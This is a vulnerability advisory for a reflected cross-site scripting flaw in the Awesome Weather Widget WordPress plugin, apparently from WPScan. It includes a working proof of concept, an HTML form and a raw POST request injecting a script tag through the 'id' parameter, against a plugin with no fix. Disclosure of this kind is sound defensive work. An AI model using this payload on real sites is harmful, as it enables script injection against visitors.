Awesome Weather Widget <= 3.0.2 - Reflected Cross-site Scripting (XSS)
Description
The plugin does not sanitize the id parameter of its awesome_weather_refresh AJAX action, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) Vulnerability. Note (WPScanTeam): The issue was reported to the WP plugins team on May 4th, 2021, then June 7th, 2021 due to lack of update.
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="awesome_weather_refresh" />
<input type="hidden" name="owm_city_id" value="1" />
<input type="hidden" name="id" value='aa"><script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close
Cookie: [unauthenticated/any authenticated]
action=awesome_weather_refresh&owm_city_id=1&id=aa"><script>alert(/XSS/)</script> Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Truoc Phan
Submitter
Truoc Phan
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-06-28 (about 6 months ago)
Added
2021-06-28 (about 6 months ago)
Last Updated
2022-01-02 (about 19 days ago)